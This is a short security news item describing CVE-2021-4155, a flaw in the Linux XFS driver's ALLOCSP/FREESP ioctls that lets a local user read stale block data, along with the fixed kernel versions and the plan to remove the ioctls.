A vulnerability has been discovered in the code of the XFS file system (CVE-2021-4155), which allows a local unprivileged user to read data from unused blocks directly from a block device. All significant versions of the Linux kernel older than 5.16 that contain the XFS driver are affected by this problem. The fix is included in version 5.16, as well as in kernel updates 5.15.14, 5.10.91, 5.4.171, 4.19.225, etc. The status of the formation of updates with the elimination of the problem in distributions can be tracked on these pages: Debian, RHEL, SUSE, Fedora, Ubuntu, Arch.

The vulnerability is caused by the incorrect behavior of two XFS-specific ioctl(XFS_IOC_ALLOCSP) and ioctl(XFS_IOC_FREESP), which are a functional analogue of the common core system call fallocate(). When increasing the size of a file that is not aligned to the block size, ioctl XFS_IOC_ALLOCSP/XFS_IOC_FREESP do not reset the tail bytes to the next block boundary. Thus, on XFS with a standard block size of 4096 bytes, an attacker can read 4095 bytes of the previous recorded data from each block. The specified areas may contain data from deleted files of defragmented files, as well as data from files with deduplicated blocks.

You can check your system for a problem using a simple prototype exploit. If, after executing the proposed sequence of commands, it is possible to read the text of Shakespeare, then the FS driver is vulnerable. The initial mounting of the XFS partition for demonstration requires superuser rights.

Since ioctl(XFS_IOC_ALLOCSP) and ioctl(XFS_IOC_FREESP) are practically identical in functionality to the standard fallocate(), and their only difference is data leakage, their presence is similar to a backdoor. Despite the general policy not to change existing interfaces in the kernel, at Linus' suggestion, it was decided to completely remove these ioctl's in the next version.